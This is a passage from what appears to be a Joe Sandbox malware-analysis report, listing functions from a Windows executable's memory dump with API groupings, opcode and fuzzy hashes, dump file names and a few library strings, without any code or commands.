                                                              • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
                                                              • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                              • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
                                                              Function 0000000140011AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProcSleep
                                                              • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                              • API String ID: 938261879-1339284965
                                                              • Opcode ID: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                              • Instruction ID: 258e5301f75bcfa7e340e12184f2e3f20ed82b399a9dd39da3854f47a4428b06
                                                              • Opcode Fuzzy Hash: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                              • Instruction Fuzzy Hash: AB118F3120974585EB5ADF57E8843E973A0FB8CBD0F488029AB0A0B666EF3AC595C340
                                                              Function 000000014000BF44 Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$CurrentThread$EnableEnumWindows
                                                              • String ID:
                                                              • API String ID: 2527101397-0
                                                              • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                              • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
                                                              • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                              • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
                                                              Function 00000001400110DC Relevance: 9.1, APIs: 6, Instructions: 62memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocValue$Heap
                                                              • String ID:
                                                              • API String ID: 2472784365-0
                                                              • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                              • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
                                                              • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                              • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
                                                              Function 0000000140007284 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 458812214-0
                                                              • Opcode ID: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                              • Instruction ID: 6ed0f769cbd5916c92599595d34faf5ec2fc13e913d525d246d608b89e2aac48
                                                              • Opcode Fuzzy Hash: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                              • Instruction Fuzzy Hash: FD210076204B0081EB06DB22E8943E973A4FB8CBC4F988026EB4D47779DF39C946C340
                                                              Function 0000000140011968 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                              • String ID:
                                                              • API String ID: 3171405041-0
                                                              • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
                                                              • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
                                                              Function 00000001400117FC Relevance: 6.3, APIs: 5, Instructions: 99memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                                                              • String ID:
                                                              • API String ID: 2544007295-0
                                                              • Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
                                                              • Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
                                                              Function 000000014000E824 Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memset$memmove
                                                              • String ID:
                                                              • API String ID: 3527438329-0
                                                              • Opcode ID: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction ID: dba297aa8fb042b18ff0822facc25e4acf5e394d44c3b4579297ae20e1131b5c
                                                              • Opcode Fuzzy Hash: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction Fuzzy Hash: E231007271064081FB16DA2BE4507E96612E38DBD0F848126EB1A83BAACA7EC502C740
                                                              Function 00000001400130CB Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $header crc mismatch
                                                              • API String ID: 0-4092041874
                                                              • Opcode ID: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction ID: f6894c87bdfd3a48e6411c52319aba3e102a5ca19e93322268f312efd41433f4
                                                              • Opcode Fuzzy Hash: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction Fuzzy Hash: 41A18FB26003508BFB269E1AC48C7AE3BE6F7587C8F064558EB964B3A4D776C954C780
                                                              Function 0000000140007A50 Relevance: 6.2, APIs: 4, Instructions: 163memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heapwcsncpy$AllocFree
                                                              • String ID:
                                                              • API String ID: 1479455602-0
                                                              • Opcode ID: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction ID: 28fd82db213d89e843f0df720333d3fbeca218ccf85cb71e10007619eb34b75b
                                                              • Opcode Fuzzy Hash: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction Fuzzy Hash: BF51A0B2B0068486EA66DF26A404BEA67E1F789BD4F588125EF4D477E5EB3CC542C300
                                                              Function 00000001400136B0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memmove
                                                              • String ID: $ $invalid stored block lengths
                                                              • API String ID: 2162964266-1718185709
                                                              • Opcode ID: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction ID: 754f218cd566fbce8dd602483dcb0b6cf2df6dd41c0e80f26ad42ee7a9f80f3a
                                                              • Opcode Fuzzy Hash: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction Fuzzy Hash: 3A417B766006508BE7268F27D5887AE3BA0F3087C8F155119FF8A4BBA4C776D8A1CB40
                                                              Function 000000014000C4F0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: EntryFunctionLookup$UnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3286588846-0
                                                              • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
                                                              • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
                                                              Function 00000001400085F0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CharLower
                                                              • String ID:
                                                              • API String ID: 1615517891-0
                                                              • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                                              • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                                              Function 00000001400171F0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction ID: 84a502ef329111f45b75735ee98b05bbb8abde518fb530cc481733cdeaf2302d
                                                              • Opcode Fuzzy Hash: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction Fuzzy Hash: 76216532608B8086D725CF56B44079AB7A5F7887D4F088325FF9917BA9DF3DC5529700
                                                              Function 000000014000DCA4 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                              • String ID:
                                                              • API String ID: 4012708801-0
                                                              • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                                              • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                                              Function 000000014001147C Relevance: 5.1, APIs: 4, Instructions: 122memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                                              • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                                              Function 000000014000D02C Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeapmemsetwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 1807340688-0
                                                              • Opcode ID: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction ID: 2291175711b854bc4f74fb4265d0f1bd771c1a5bff4f4550b8324bf1b1149364
                                                              • Opcode Fuzzy Hash: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction Fuzzy Hash: DA3129B1605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518351
                                                              Function 000000014000CCD8 Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 3901518246-0
                                                              • Opcode ID: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction ID: 7f7b652e9f7b58be947c1c734e7a82da3d99598ff0fb71c13e03353473737a2d
                                                              • Opcode Fuzzy Hash: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction Fuzzy Hash: 063142B2211B409BE702DF13EA807A937A4F78CBD0F448429EB4847B65DF79E4A6C740
                                                              Function 00000001400112A8 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                                              • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                                              Function 0000000140017120 Relevance: 5.0, APIs: 4, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction ID: 61c3440d716b3c64d08436ee48054615140ae5ecb8d8084460387f48d4e9dd56
                                                              • Opcode Fuzzy Hash: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction Fuzzy Hash: BB11C13260878082EB25CF26B41076AB7A4FB89BE4F140328EF9D57BE5DF39C0118704
                                                              Function 0000000140011668 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalFreeHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 1298188129-0
                                                              • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                                              • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                                              Function 000000014000CE30 Relevance: 5.0, APIs: 4, Instructions: 37memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
